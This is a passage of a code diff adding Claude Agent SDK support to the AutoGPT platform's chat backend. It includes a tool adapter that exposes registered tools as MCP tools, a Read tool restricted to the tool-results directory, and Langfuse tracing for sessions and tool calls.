+                    # Stop reading SDK messages once a StreamFinish has
+                    # been forwarded.
+                    if stream_completed:
+                        break
+
+                # Safety net: keep an assistant message that has content or
+                # tool calls but was never appended during streaming.
+                if (
+                    assistant_response.content or assistant_response.tool_calls
+                ) and not has_appended_assistant:
+                    session.messages.append(assistant_response)
+
+        except ImportError:
+            logger.warning(
+                "[SDK] claude-agent-sdk not available, using Anthropic fallback"
+            )
+            async for response in stream_with_anthropic(
+                session, system_prompt, text_block_id
+            ):
+                if isinstance(response, StreamFinish):
+                    stream_completed = True
+                yield response
+
+        # Persist the messages and usage accumulated during streaming.
+        await upsert_chat_session(session)
+        logger.debug(
+            f"[SDK] Session {session_id} saved with {len(session.messages)} messages"
+        )
+        # Make sure the client always receives a terminating StreamFinish.
+        if not stream_completed:
+            yield StreamFinish()
+
+    except Exception as e:
+        logger.error(f"[SDK] Error: {e}", exc_info=True)
+        # Best-effort save of whatever was accumulated; a failure here is
+        # only logged. The client gets a generic error without details.
+        try:
+            await upsert_chat_session(session)
+        except Exception as save_err:
+            logger.error(f"[SDK] Failed to save session on error: {save_err}")
+        yield StreamError(
+            errorText="An error occurred. Please try again.",
+            code="sdk_error",
+        )
+        yield StreamFinish()
+    finally:
+        # Runs on success, on error and on the early return above.
+        _cleanup_sdk_tool_results(sdk_cwd)
+
+
+async def _update_title_async(
+    session_id: str, message: str, user_id: str | None = None
+) -> None:
+    """Generate a title from ``message`` and store it on the session.
+
+    Every exception is logged as a warning and swallowed, so a failure
+    here never propagates to whoever awaits or schedules this coroutine.
+    """
+    try:
+        generated = await _generate_session_title(
+            message, user_id=user_id, session_id=session_id
+        )
+        if not generated:
+            # No usable title was produced; leave the session as it is.
+            return
+        await update_session_title(session_id, generated)
+        logger.debug(f"[SDK] Generated title for {session_id}: {generated}")
+    except Exception as err:
+        logger.warning(f"[SDK] Failed to update session title: {err}")
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tool_adapter.py
@@ -0,0 +1,321 @@
+"""Tool adapter for wrapping existing CoPilot tools as Claude Agent SDK MCP tools.
+
+This module provides the adapter layer that converts existing BaseTool implementations
+into in-process MCP tools that can be used with the Claude Agent SDK.
+"""
+
+import json
+import logging
+import os
+import uuid
+from contextvars import ContextVar
+from typing import Any
+
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools import TOOL_REGISTRY
+from backend.api.features.chat.tools.base import BaseTool
+
+logger = logging.getLogger(__name__)
+
+# Allowed base directory for the Read tool (SDK saves oversized tool results here).
+# "~" is expanded once, when this module is imported.
+_SDK_TOOL_RESULTS_DIR = os.path.expanduser("~/.claude/")
+
+# MCP server naming - the SDK prefixes tool names as "mcp__{server_name}__{tool}"
+MCP_SERVER_NAME = "copilot"
+MCP_TOOL_PREFIX = f"mcp__{MCP_SERVER_NAME}__"
+
+# Context variables to pass user/session info to tool execution.
+# All default to None until set_execution_context() is called.
+_current_user_id: ContextVar[str | None] = ContextVar("current_user_id", default=None)
+_current_session: ContextVar[ChatSession | None] = ContextVar(
+    "current_session", default=None
+)
+_current_tool_call_id: ContextVar[str | None] = ContextVar(
+    "current_tool_call_id", default=None
+)
+
+# Stash for MCP tool outputs before the SDK potentially truncates them.
+# Keyed by tool_name → full output string. Consumed (popped) by the
+# response adapter when it builds StreamToolOutputAvailable.
+# The default is None rather than a dict; set_execution_context() installs
+# a fresh dict, and readers treat None as "no stash available".
+# NOTE(review): the key is the tool name only, so a second call to the same
+# tool before the first output is popped overwrites the first entry.
+_pending_tool_outputs: ContextVar[dict[str, str]] = ContextVar(
+    "pending_tool_outputs", default=None  # type: ignore[arg-type]
+)
+
+
+def set_execution_context(
+    user_id: str | None,
+    session: ChatSession,
+    tool_call_id: str | None = None,
+) -> None:
+    """Bind user, session and tool-call id to the current context.
+
+    Call this before streaming begins so that tool handlers can read the
+    values back through get_execution_context(). A fresh, empty stash for
+    pending tool outputs is installed at the same time.
+    """
+    bindings = (
+        (_current_user_id, user_id),
+        (_current_session, session),
+        (_current_tool_call_id, tool_call_id),
+        (_pending_tool_outputs, {}),
+    )
+    for context_var, value in bindings:
+        context_var.set(value)
+
+
+def get_execution_context() -> tuple[str | None, ChatSession | None, str | None]:
+    """Return ``(user_id, session, tool_call_id)`` for the current context.
+
+    Each element falls back to None when no value has been set.
+    """
+    user_id = _current_user_id.get()
+    session = _current_session.get()
+    tool_call_id = _current_tool_call_id.get()
+    return user_id, session, tool_call_id
+
+
+def pop_pending_tool_output(tool_name: str) -> str | None:
+    """Remove and return the full output stashed for *tool_name*.
+
+    Tool handlers stash their complete output before handing it to the
+    SDK, because the SDK CLI may truncate large results (writing them to
+    disk and substituting a file reference). Popping the stash lets the
+    response adapter forward the original output to the frontend for
+    proper widget rendering.
+
+    Returns ``None`` if no stash exists in this context or nothing was
+    stashed for *tool_name*.
+    """
+    stash = _pending_tool_outputs.get(None)
+    return None if stash is None else stash.pop(tool_name, None)
+
+
+def create_tool_handler(base_tool: BaseTool):
+    """Build an async MCP handler that delegates to *base_tool*.
+
+    The returned coroutine function takes the tool arguments as a dict,
+    runs ``base_tool.execute`` with the user and session taken from the
+    execution context, and returns an MCP response dict of the form
+    ``{"content": [...], "isError": bool}``. It does not raise: a missing
+    session or any exception from the tool is reported as an error
+    response instead.
+    """
+
+    def _error_response(payload: dict[str, Any]) -> dict[str, Any]:
+        """Wrap *payload* as a JSON text block flagged as an MCP error."""
+        return {
+            "content": [{"type": "text", "text": json.dumps(payload)}],
+            "isError": True,
+        }
+
+    async def tool_handler(args: dict[str, Any]) -> dict[str, Any]:
+        """Execute the wrapped tool and return MCP-formatted response."""
+        user_id, session, tool_call_id = get_execution_context()
+        if session is None:
+            return _error_response(
+                {"error": "No session context available", "type": "error"}
+            )
+
+        try:
+            # Use the context's tool_call_id when one is set; otherwise
+            # generate a unique id per invocation for correlation.
+            call_id = tool_call_id or f"sdk-{uuid.uuid4().hex[:12]}"
+            result = await base_tool.execute(
+                user_id=user_id,
+                session=session,
+                tool_call_id=call_id,
+                **args,
+            )
+
+            # Strings pass through untouched; anything else is JSON-encoded.
+            if isinstance(result.output, str):
+                text = result.output
+            else:
+                text = json.dumps(result.output)
+
+            # Keep the untruncated output so the response adapter can pop
+            # it later for frontend widget rendering.
+            stash = _pending_tool_outputs.get(None)
+            if stash is not None:
+                stash[base_tool.name] = text
+
+            return {
+                "content": [{"type": "text", "text": text}],
+                "isError": not result.success,
+            }
+        except Exception as e:
+            logger.error(f"Error executing tool {base_tool.name}: {e}", exc_info=True)
+            return _error_response(
+                {
+                    "error": str(e),
+                    "type": "error",
+                    "message": f"Failed to execute {base_tool.name}",
+                }
+            )
+
+    return tool_handler
+
+
+def _build_input_schema(base_tool: BaseTool) -> dict[str, Any]:
+    """Derive an object-typed JSON Schema from the tool's ``parameters``.
+
+    Only ``properties`` and ``required`` are carried over; a missing key
+    becomes an empty dict or an empty list respectively.
+    """
+    schema: dict[str, Any] = {"type": "object"}
+    schema["properties"] = base_tool.parameters.get("properties", {})
+    schema["required"] = base_tool.parameters.get("required", [])
+    return schema
+
+
+def get_tool_definitions() -> list[dict[str, Any]]:
+    """Describe every registered tool in MCP format.
+
+    Returns one dict per TOOL_REGISTRY entry with the keys ``name``,
+    ``description`` and ``inputSchema``, in registry order. The result can
+    be used with create_sdk_mcp_server or as raw tool definitions.
+    """
+    return [
+        {
+            "name": registered_name,
+            "description": registered_tool.description,
+            "inputSchema": _build_input_schema(registered_tool),
+        }
+        for registered_name, registered_tool in TOOL_REGISTRY.items()
+    ]
+
+
+def get_tool_handlers() -> dict[str, Any]:
+    """Build a handler for every registered tool.
+
+    Returns a dict mapping each TOOL_REGISTRY name to a new handler
+    created by create_tool_handler().
+    """
+    return {
+        registered_name: create_tool_handler(registered_tool)
+        for registered_name, registered_tool in TOOL_REGISTRY.items()
+    }
+
+
+async def _read_file_handler(args: dict[str, Any]) -> dict[str, Any]:
+    """Read a range of lines from a file under the SDK tool-results directory.
+
+    Args:
+        args: MCP tool arguments. ``file_path`` is the file to read,
+            ``offset`` the 0-indexed first line (default 0) and ``limit``
+            the maximum number of lines to return (default 2000).
+            Negative values are clamped to 0.
+
+    Returns:
+        An MCP response dict holding the selected lines as a single text
+        block, or an ``isError`` response when the path lies outside
+        ``_SDK_TOOL_RESULTS_DIR``, the arguments are invalid, or the file
+        cannot be read.
+
+    The file is only read here; it is neither modified nor deleted.
+    """
+    from itertools import islice
+
+    def _error(text: str) -> dict[str, Any]:
+        """Build an MCP error response carrying *text*."""
+        return {"content": [{"type": "text", "text": text}], "isError": True}
+
+    file_path = args.get("file_path", "")
+    if not isinstance(file_path, str) or not file_path:
+        return _error(f"Access denied: {file_path}")
+
+    try:
+        raw_offset = args.get("offset")
+        raw_limit = args.get("limit")
+        offset = 0 if raw_offset is None else max(0, int(raw_offset))
+        limit = 2000 if raw_limit is None else max(0, int(raw_limit))
+    except (TypeError, ValueError):
+        return _error("Invalid offset/limit: both must be integers")
+
+    # Security: only allow reads below the tool-results directory. Both
+    # sides are resolved with realpath() so that symlinks cannot be used to
+    # escape the directory, and a symlinked home directory does not cause
+    # every legitimate read to be rejected. join(root, "") guarantees a
+    # trailing separator, so a sibling such as "~/.claude-other" never
+    # matches.
+    allowed_prefix = os.path.join(os.path.realpath(_SDK_TOOL_RESULTS_DIR), "")
+    real_path = os.path.realpath(file_path)
+    if not real_path.startswith(allowed_prefix):
+        return _error(f"Access denied: {file_path}")
+
+    try:
+        # Stream the file and stop after the requested window instead of
+        # loading every line of a potentially huge result into memory.
+        with open(real_path, encoding="utf-8", errors="replace") as f:
+            selected = list(islice(f, offset, offset + limit))
+        content = "".join(selected)
+        return {"content": [{"type": "text", "text": content}], "isError": False}
+    except FileNotFoundError:
+        return _error(f"File not found: {file_path}")
+    except Exception as e:
+        return _error(f"Error reading file: {e}")
+
+
+# Name, description and JSON Schema under which _read_file_handler is
+# registered as an MCP tool in create_copilot_mcp_server().
+_READ_TOOL_NAME = "Read"
+_READ_TOOL_DESCRIPTION = (
+    "Read a file from the local filesystem. "
+    "Use offset and limit to read specific line ranges for large files."
+)
+# Only file_path is required; offset and limit are optional.
+_READ_TOOL_SCHEMA = {
+    "type": "object",
+    "properties": {
+        "file_path": {
+            "type": "string",
+            "description": "The absolute path to the file to read",
+        },
+        "offset": {
+            "type": "integer",
+            "description": "Line number to start reading from (0-indexed). Default: 0",
+        },
+        "limit": {
+            "type": "integer",
+            "description": "Number of lines to read. Default: 2000",
+        },
+    },
+    "required": ["file_path"],
+}
+
+
+# Create the MCP server configuration
+def create_copilot_mcp_server():
+    """Create an in-process MCP server exposing the CoPilot tools.
+
+    Every TOOL_REGISTRY entry is wrapped with create_tool_handler() and
+    registered under its registry name; a ``Read`` tool is added so the
+    SDK can read back oversized tool results. The returned server can be
+    passed to ClaudeAgentOptions.mcp_servers.
+
+    Raises:
+        ImportError: If the claude-agent-sdk package is not installed. It
+            is deliberately left to propagate so the caller can fall back.
+    """
+    # Imported lazily so this module can be imported without the SDK.
+    from claude_agent_sdk import create_sdk_mcp_server, tool
+
+    def _as_sdk_tool(name: str, wrapped: BaseTool):
+        """Decorate the handler of *wrapped* as an SDK tool called *name*."""
+        handler = create_tool_handler(wrapped)
+        return tool(name, wrapped.description, _build_input_schema(wrapped))(handler)
+
+    sdk_tools = [
+        _as_sdk_tool(registered_name, registered_tool)
+        for registered_name, registered_tool in TOOL_REGISTRY.items()
+    ]
+
+    # The Read tool goes last, after all registry tools.
+    sdk_tools.append(
+        tool(_READ_TOOL_NAME, _READ_TOOL_DESCRIPTION, _READ_TOOL_SCHEMA)(
+            _read_file_handler
+        )
+    )
+
+    return create_sdk_mcp_server(
+        name=MCP_SERVER_NAME,
+        version="1.0.0",
+        tools=sdk_tools,
+    )
+
+
+# SDK built-in tools allowed within the workspace directory.
+# Security hooks validate that file paths stay within sdk_cwd
+# and that Bash commands are restricted to a safe allowlist.
+_SDK_BUILTIN_TOOLS = ["Read", "Write", "Edit", "Glob", "Grep", "Bash"]
+
+# List of tool names for allowed_tools configuration
+# Include MCP tools, the MCP Read tool for oversized results,
+# and SDK built-in file tools for workspace operations.
+# Note that "Read" appears twice on purpose: once prefixed as the MCP tool
+# and once unprefixed as the SDK built-in.
+# The list is computed once at import time from TOOL_REGISTRY.
+COPILOT_TOOL_NAMES = [
+    *[f"{MCP_TOOL_PREFIX}{name}" for name in TOOL_REGISTRY.keys()],
+    f"{MCP_TOOL_PREFIX}{_READ_TOOL_NAME}",
+    *_SDK_BUILTIN_TOOLS,
+]
--- a/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
+++ b/autogpt_platform/backend/backend/api/features/chat/sdk/tracing.py
@@ -0,0 +1,429 @@
+"""Langfuse tracing integration for Claude Agent SDK.
+
+This module provides modular, non-invasive observability for SDK sessions.
+All tracing is opt-in (only active when Langfuse credentials are configured)
+and designed to not affect the core execution flow.
+
+Usage:
+    async with TracedSession(session_id, user_id) as tracer:
+        # Your SDK code here
+        tracer.log_user_message(message)
+        async for sdk_msg in client.receive_messages():
+            tracer.log_sdk_message(sdk_msg)
+        # Usage and cost are recorded automatically when log_sdk_message()
+        # receives a ResultMessage; no separate call is needed.
+"""
+
+from __future__ import annotations
+
+import logging
+import time
+from contextlib import asynccontextmanager
+from dataclasses import dataclass, field
+from typing import TYPE_CHECKING, Any
+
+from backend.util.settings import Settings
+
+if TYPE_CHECKING:
+    from claude_agent_sdk import Message, ResultMessage
+
+logger = logging.getLogger(__name__)
+# Instantiated once at import time; read by _is_langfuse_configured().
+settings = Settings()
+
+
+def _is_langfuse_configured() -> bool:
+    """Return True only when both Langfuse keys (public and secret) are set."""
+    secrets = settings.secrets
+    return bool(secrets.langfuse_public_key and secrets.langfuse_secret_key)
+
+
+@dataclass
+class ToolSpan:
+    """Tracks a single tool call for tracing.
+
+    Times are ``time.perf_counter()`` readings (seconds), not wall-clock
+    timestamps.
+    """
+
+    # Id of the tool-use block that started the call.
+    tool_call_id: str
+    tool_name: str
+    # Arguments the tool was called with.
+    input: dict[str, Any]
+    # Captured when the span object is created.
+    start_time: float = field(default_factory=time.perf_counter)
+    # Filled in once the matching tool result arrives.
+    output: str | None = None
+    # Set to False when the tool result is flagged as an error.
+    success: bool = True
+    # Stays None until the matching tool result arrives.
+    end_time: float | None = None
+
+
+@dataclass
+class GenerationSpan:
+    """Tracks an LLM generation (text output) for tracing.
+
+    Times are ``time.perf_counter()`` readings (seconds), not wall-clock
+    timestamps.
+    """
+
+    # Text accumulated from the assistant's text blocks.
+    text: str = ""
+    # Captured when the span object is created.
+    start_time: float = field(default_factory=time.perf_counter)
+    # Stays None until the generation is finalized.
+    end_time: float | None = None
+    # Tool calls issued during this generation.
+    tool_calls: list[ToolSpan] = field(default_factory=list)
+
+
+class TracedSession:
+    """Context manager for tracing a Claude Agent SDK session with Langfuse.
+
+    Automatically creates a trace with:
+    - Session-level metadata (user_id, session_id)
+    - Generation spans for LLM outputs
+    - Tool call spans with input/output
+    - Token usage and cost (from ResultMessage)
+
+    If Langfuse is not configured, all methods are no-ops.
+    """
+
+    def __init__(
+        self,
+        session_id: str,
+        user_id: str | None = None,
+        system_prompt: str | None = None,
+        model: str | None = None,
+    ):
+        """Store the session details and reset all tracing state.
+
+        No trace is created here; that happens in ``__aenter__``.
+        ``enabled`` records whether Langfuse credentials were configured
+        at construction time.
+        """
+        # Caller-supplied identifiers and settings
+        self.session_id, self.user_id = session_id, user_id
+        self.system_prompt, self.model = system_prompt, model
+        self.enabled = _is_langfuse_configured()
+
+        # Langfuse handles, populated in __aenter__
+        self._langfuse: Any = None
+        self._trace: Any = None
+        self._start_time: float = 0
+
+        # Data collected while the session runs
+        self._user_message: str | None = None
+        self._current_generation: GenerationSpan | None = None
+        self._generations: list[GenerationSpan] = []
+        self._pending_tools: dict[str, ToolSpan] = {}
+
+    async def __aenter__(self) -> TracedSession:
+        """Open the root Langfuse trace when tracing is enabled.
+
+        Tracing problems never propagate: if the client or the trace
+        cannot be created, a warning is logged and tracing is switched
+        off for this session. Always returns ``self``.
+        """
+        if self.enabled:
+            try:
+                from langfuse import get_client
+
+                self._langfuse = get_client()
+                self._start_time = time.perf_counter()
+
+                # NOTE(review): get_client() and .trace() look like they
+                # belong to different Langfuse SDK generations; confirm
+                # against the installed version. A mismatch would land in
+                # the except branch and quietly disable tracing.
+                trace_metadata = {
+                    "sdk": "claude-agent-sdk",
+                    "has_system_prompt": bool(self.system_prompt),
+                }
+                self._trace = self._langfuse.trace(
+                    name="copilot-sdk-session",
+                    session_id=self.session_id,
+                    user_id=self.user_id,
+                    metadata=trace_metadata,
+                )
+                logger.debug(f"[Tracing] Started trace for session {self.session_id}")
+            except Exception as e:
+                logger.warning(f"[Tracing] Failed to start trace: {e}")
+                self.enabled = False
+
+        return self
+
+    async def __aexit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:
+        """Emit the collected spans and the final status to the trace.
+
+        Does nothing when tracing is disabled or no trace was started.
+        Span times are converted from ``time.perf_counter()`` readings to
+        timezone-aware UTC datetimes before being sent. Failures are
+        logged and swallowed, and an exception raised inside the ``async
+        with`` body is never suppressed (the method returns None).
+        """
+        if not self.enabled or not self._trace:
+            return
+
+        try:
+            from datetime import datetime, timedelta, timezone
+
+            # Finalize any open generation
+            self._finalize_current_generation()
+
+            # The spans store perf_counter() readings: monotonic seconds
+            # with an arbitrary origin, which are not timestamps. Anchor
+            # them to the wall clock once, then shift each reading by its
+            # distance from "now".
+            wall_now = datetime.now(timezone.utc)
+            perf_now = time.perf_counter()
+
+            def to_datetime(perf_reading: float | None) -> datetime:
+                """Convert a perf_counter reading to UTC; None means now."""
+                if perf_reading is None:
+                    return wall_now
+                return wall_now - timedelta(seconds=perf_now - perf_reading)
+
+            # Add generations as spans
+            for gen in self._generations:
+                self._trace.span(
+                    name="llm-generation",
+                    start_time=to_datetime(gen.start_time),
+                    end_time=to_datetime(gen.end_time),
+                    output=gen.text[:1000] if gen.text else None,  # Truncate
+                    metadata={"tool_calls": len(gen.tool_calls)},
+                )
+
+                # Add the generation's tool calls as further spans on the
+                # same trace.
+                for tool in gen.tool_calls:
+                    self._trace.span(
+                        name=f"tool:{tool.tool_name}",
+                        start_time=to_datetime(tool.start_time),
+                        end_time=to_datetime(tool.end_time),
+                        input=tool.input,
+                        output=tool.output[:500] if tool.output else None,
+                        metadata={
+                            "tool_call_id": tool.tool_call_id,
+                            "success": tool.success,
+                        },
+                    )
+
+            # Update trace with final status
+            status = "error" if exc_type else "success"
+            self._trace.update(
+                output=self._generations[-1].text[:500] if self._generations else None,
+                metadata={"status": status, "num_generations": len(self._generations)},
+            )
+
+            # No explicit flush is issued here; delivery is left to the
+            # Langfuse client (presumably batched in the background).
+            logger.debug(
+                f"[Tracing] Completed trace for session {self.session_id}, "
+                f"{len(self._generations)} generations"
+            )
+
+        except Exception as e:
+            logger.warning(f"[Tracing] Failed to finalize trace: {e}")
+
+    def log_user_message(self, message: str) -> None:
+        """Record the user's input on the trace.
+
+        The message is remembered on the tracer and its first 1000
+        characters are sent as the trace input. Does nothing when tracing
+        is disabled or no trace exists; update failures are only logged.
+        """
+        if self.enabled and self._trace:
+            self._user_message = message
+            try:
+                self._trace.update(input=message[:1000])
+            except Exception as e:
+                logger.debug(f"[Tracing] Failed to log user message: {e}")
+
+    def log_sdk_message(self, sdk_message: Message) -> None:
+        """Fold one SDK message into the tracing state.
+
+        * ``AssistantMessage``: text is appended to the current generation
+          (one is opened if needed) and each tool-use block starts a
+          pending tool span.
+        * ``UserMessage``: tool-result blocks complete their pending tool
+          span, then the current generation is finalized.
+        * ``ResultMessage``: usage and cost are logged.
+
+        Other message types are ignored. Does nothing when tracing is
+        disabled; any failure is logged at debug level and swallowed.
+        """
+        if not self.enabled:
+            return
+
+        try:
+            from claude_agent_sdk import (
+                AssistantMessage,
+                ResultMessage,
+                TextBlock,
+                ToolResultBlock,
+                ToolUseBlock,
+                UserMessage,
+            )
+
+            if isinstance(sdk_message, AssistantMessage):
+                # Open a generation lazily on the first assistant message.
+                generation = self._current_generation
+                if generation is None:
+                    generation = GenerationSpan()
+                    self._current_generation = generation
+                    self._generations.append(generation)
+
+                for block in sdk_message.content:
+                    if isinstance(block, TextBlock) and block.text:
+                        generation.text += block.text
+                    elif isinstance(block, ToolUseBlock):
+                        started = ToolSpan(
+                            tool_call_id=block.id,
+                            tool_name=block.name,
+                            input=block.input or {},
+                        )
+                        # Indexed by id so the later result can find it.
+                        self._pending_tools[block.id] = started
+                        generation.tool_calls.append(started)
+
+            elif isinstance(sdk_message, UserMessage):
+                # UserMessage carries tool results; non-list content has
+                # no blocks to inspect.
+                content = sdk_message.content
+                for block in content if isinstance(content, list) else []:
+                    if not (isinstance(block, ToolResultBlock) and block.tool_use_id):
+                        continue
+                    finished = self._pending_tools.get(block.tool_use_id)
+                    if not finished:
+                        continue
+                    finished.end_time = time.perf_counter()
+                    finished.success = not (block.is_error or False)
+                    finished.output = self._extract_tool_output(block.content)
+
+                # Tool results close the generation; the next
+                # AssistantMessage opens a new one.
+                self._finalize_current_generation()
+
+            elif isinstance(sdk_message, ResultMessage):
+                self._log_result(sdk_message)
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log SDK message: {e}")
+
+    def _log_result(self, result: ResultMessage) -> None:
+        """Attach the final result's duration, usage and cost to the trace.
+
+        Updates the trace metadata and, when usage or a non-zero cost is
+        present, also records a ``claude-sdk-completion`` generation for
+        Langfuse usage tracking. Does nothing when tracing is disabled or
+        no trace exists; failures are logged at debug level and swallowed.
+        """
+        if not (self.enabled and self._trace):
+            return
+
+        try:
+            usage = result.usage or {}
+            summary: dict[str, Any] = {
+                "duration_ms": result.duration_ms,
+                "duration_api_ms": result.duration_api_ms,
+                "num_turns": result.num_turns,
+                "is_error": result.is_error,
+            }
+
+            cost = result.total_cost_usd
+            if cost is not None:
+                summary["cost_usd"] = cost
+            if usage:
+                summary["usage"] = usage
+
+            self._trace.update(metadata=summary)
+
+            # Log as a generation for proper Langfuse cost/usage tracking
+            if usage or cost:
+                token_usage = None
+                if usage:
+                    prompt_tokens = usage.get("input_tokens", 0)
+                    completion_tokens = usage.get("output_tokens", 0)
+                    token_usage = {
+                        "input": prompt_tokens,
+                        "output": completion_tokens,
+                        "total": prompt_tokens + completion_tokens,
+                    }
+                self._trace.generation(
+                    name="claude-sdk-completion",
+                    model=self.model or "claude-sonnet-4-20250514",
+                    usage=token_usage,
+                    metadata={"cost_usd": cost},
+                )
+
+            # The cost is only mentioned when it is non-zero.
+            if cost:
+                summary_line = (
+                    f"[Tracing] Logged result: {result.num_turns} turns, "
+                    f"${cost:.4f} cost"
+                )
+            else:
+                summary_line = f"[Tracing] Logged result: {result.num_turns} turns"
+            logger.debug(summary_line)
+
+        except Exception as e:
+            logger.debug(f"[Tracing] Failed to log result: {e}")
+
+    def _finalize_current_generation(self) -> None:
+        """Close the generation currently being accumulated, if there is one.
+
+        Stamps its end_time with time.perf_counter() and clears
+        self._current_generation; a no-op when no generation is open.
+        """
+        generation = self._current_generation
+        if not generation:
+            return
+        generation.end_time = time.perf_counter()
+        self._current_generation = None
+
+    @staticmethod
+    def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
+        """Flatten a tool result's content into a single string.
+
+        Args:
+            content: A plain string, a list of content-block dicts, or None.
+
+        Returns:
+            The string itself when content is a string. For a list, the
+            concatenated "text" values of the blocks whose "type" is "text", or
+            ``str(content)`` when the list holds no text blocks. "" for None or
+            any other empty content (including an empty list).
+        """
+        if isinstance(content, str):
+            return content
+        # Handle every empty payload the same way. An empty list must not reach
+        # the list branch, where it would be rendered as the literal "[]".
+        if not content:
+            return ""
+        if isinstance(content, list):
+            parts = [
+                item.get("text", "") for item in content if item.get("type") == "text"
+            ]
+            # No text blocks at all: fall back to the list's string form.
+            return "".join(parts) if parts else str(content)
+        return str(content)
+
+
+@asynccontextmanager
+async def traced_session(
+    session_id: str,
+    user_id: str | None = None,
+    system_prompt: str | None = None,
+    model: str | None = None,
+):
+    """Open a TracedSession for the duration of an ``async with`` block.
+
+    Builds a TracedSession from the arguments, enters it as an async context
+    manager and yields that instance; the session is exited when the caller's
+    block finishes.
+
+    Usage:
+        async with traced_session(session_id, user_id) as tracer:
+            tracer.log_user_message(message)
+            async for msg in client.receive_messages():
+                tracer.log_sdk_message(msg)
+    """
+    session_tracer = TracedSession(session_id, user_id, system_prompt, model=model)
+    # Yield the constructed object itself, not whatever __aenter__ returns.
+    async with session_tracer:
+        yield session_tracer
+
+
+def create_tracing_hooks(tracer: TracedSession) -> dict[str, Any]:
+    """Create SDK hooks for fine-grained Langfuse tracing.
+
+    These hooks capture precise timing for tool executions and failures
+    that may not be visible in the message stream.
+
+    Combine with other hook dicts (e.g. security hooks) via merge_hooks, which
+    concatenates the matcher lists per event:
+        hooks = merge_hooks(security_hooks, create_tracing_hooks(tracer))
+    Do not use ``{**security_hooks, **create_tracing_hooks(tracer)}``: dict
+    unpacking keeps only the last value per key, so any security matchers
+    registered under "PreToolUse", "PostToolUse" or "PostToolUseFailure" would
+    be replaced by the tracing ones.
+
+    Args:
+        tracer: The active TracedSession instance
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions, keyed by event name
+        ("PreToolUse", "PostToolUse", "PostToolUseFailure"). An empty dict when
+        tracing is disabled or claude_agent_sdk cannot be imported.
+    """
+    if not tracer.enabled:
+        return {}
+
+    try:
+        # Imported lazily so a missing SDK only disables hook-based tracing.
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def trace_pre_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool start time for accurate duration tracking."""
+            _ = context  # context is not used by this hook
+            if not tool_use_id:
+                return {}
+            tool_name = str(input_data.get("tool_name", "unknown"))
+            tool_input = input_data.get("tool_input", {})
+
+            # Record start time in pending tools
+            # (presumably ToolSpan stamps its own start time on construction — confirm).
+            # NOTE(review): this replaces any span already stored under the same
+            # id, e.g. one registered from a ToolUseBlock in the message stream.
+            # A span already appended to a generation's tool_calls would then no
+            # longer receive the end_time/success updates made by the post hooks
+            # — confirm the ordering of hook vs. message delivery.
+            tracer._pending_tools[tool_use_id] = ToolSpan(
+                tool_call_id=tool_use_id,
+                tool_name=tool_name,
+                input=tool_input if isinstance(tool_input, dict) else {},
+            )
+            return {}
+
+        async def trace_post_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool completion for duration calculation."""
+            _ = context  # context is not used by this hook
+            # Only spans that are already pending are updated; unknown ids are ignored.
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = True
+            return {}
+
+        async def trace_post_tool_failure(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool failures for error tracking."""
+            _ = context  # context is not used by this hook
+            # Only spans that are already pending are updated; unknown ids are ignored.
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = False
+                error = input_data.get("error", "Unknown error")
+                tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
+            return {}
+
+        # One catch-all matcher ("*") per event.
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
+            ],
+        }
+
+    except ImportError:
+        logger.debug("[Tracing] SDK not available for hook-based tracing")
+        return {}
+
+
+def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
+    """Combine several hook configurations into a single dict.
+
+    For every event name, the matcher lists of all given dicts are concatenated
+    in argument order into a fresh list, so hooks from different sources (for
+    example security and tracing) are all kept instead of overwriting each
+    other. The input dicts and their lists are not modified.
+
+    Usage:
+        combined = merge_hooks(security_hooks, tracing_hooks)
+    """
+    merged: dict[str, list[Any]] = {}
+    for hooks in hook_dicts:
+        for event, event_matchers in hooks.items():
+            merged.setdefault(event, []).extend(event_matchers)
+    return merged
--- a/autogpt_platform/backend/backend/api/features/chat/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/service.py
@@ -52,8 +52,10 @@ from .response_model import (
    StreamBaseResponse,
    StreamError,
    StreamFinish,
+    StreamFinishStep,
    StreamHeartbeat,
    StreamStart,
+    StreamStartStep,
    StreamTextDelta,
    StreamTextEnd,
    StreamTextStart,
@@ -243,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
    return DEFAULT_SYSTEM_PROMPT.format(users_information=context)


-async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
+async def _build_system_prompt(
+    user_id: str | None, has_conversation_history: bool = False
+) -> tuple[str, Any]:
    """Build the full system prompt including business understanding if available.

    Args:
-        user_id: The user ID for fetching business understanding
-                     If "default" and this is the user's first session, will use "onboarding" instead.
+        user_id: The user ID for fetching business understanding.
+        has_conversation_history: Whether there's existing conversation history.
+            If True, we don't tell the model to greet/introduce (since they're
+            already in a conversation).

    Returns:
        Tuple of (compiled prompt string, business understanding object)
@@ -264,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:

    if understanding:
        context = format_understanding_for_prompt(understanding)
+    elif has_conversation_history:
